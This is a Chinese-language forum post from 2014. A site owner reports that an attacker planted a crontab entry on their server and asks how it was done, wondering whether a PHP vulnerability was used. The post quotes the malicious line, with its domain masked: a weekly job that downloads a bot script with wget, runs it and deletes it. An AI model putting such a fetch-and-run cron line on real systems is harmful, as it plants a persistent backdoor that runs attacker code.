楼主:
averywu (看文不要只会用横的看)
2014-10-01 11:19:10我的站台的crontab 被写入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影响主机,因为URL已经失效了。
PS.贴出来的URL已经处理过了,domain我改成x,以防被误点。
但实在找不出他植入的方法,有人知道吗?
PHP是否有什么漏洞能让入侵者植入这个script吗?